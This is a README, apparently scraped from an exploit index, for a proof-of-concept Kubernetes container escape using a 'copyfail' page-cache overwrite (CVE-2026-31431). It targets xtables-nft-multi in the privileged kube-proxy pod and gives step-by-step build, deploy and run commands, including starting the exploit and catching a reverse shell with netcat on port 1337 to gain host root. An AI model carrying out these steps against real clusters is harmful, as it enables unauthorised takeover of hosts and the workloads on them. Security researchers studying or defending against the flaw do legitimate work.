Share
## https://sploitus.com/exploit?id=8309D4EF-C0B7-56F3-A7A3-6773010D16C9
# How it works

This poc use copyfail exploit to overwrite page-cache of binary in `privileged: true` pod to gain host access.

This poc target `/usr/sbin/xtables-nft-multi` in `kube-proxy` pod that by default has `privileged: true`, overwrite by payload to mount host root disk then `chroot` to `escape` from pod.

## How to use

1. Compile the binary, build the image and push to registry (modify the IMAGE in Makefile)

```
sudo make docker-build
sudo make docker-push
```

2. Deploy the image using `deploy.yaml`

```
kubectl apply -f deploy.yaml
```

3. Get inside container then exec copyfail then wait for revershell

```
kubectl exec -it -n cve deploy/copy-fail-poc -- sh
copyfail /usr/sbin/xtables-nft-multi $(hostname -i) 1337
nc -lvp 1337

--- SHELL HERE ---
```

4. To cleanup use `cleanup.sh`

```
bash cleanup.sh
```

### Inspired / Reference

- [Copy-Fail-CVE-2026-31431-Kubernetes-PoC](https://github.com/Percivalll/Copy-Fail-CVE-2026-31431-Kubernetes-PoC)
- [copy-fail-c](https://github.com/tgies/copy-fail-c/)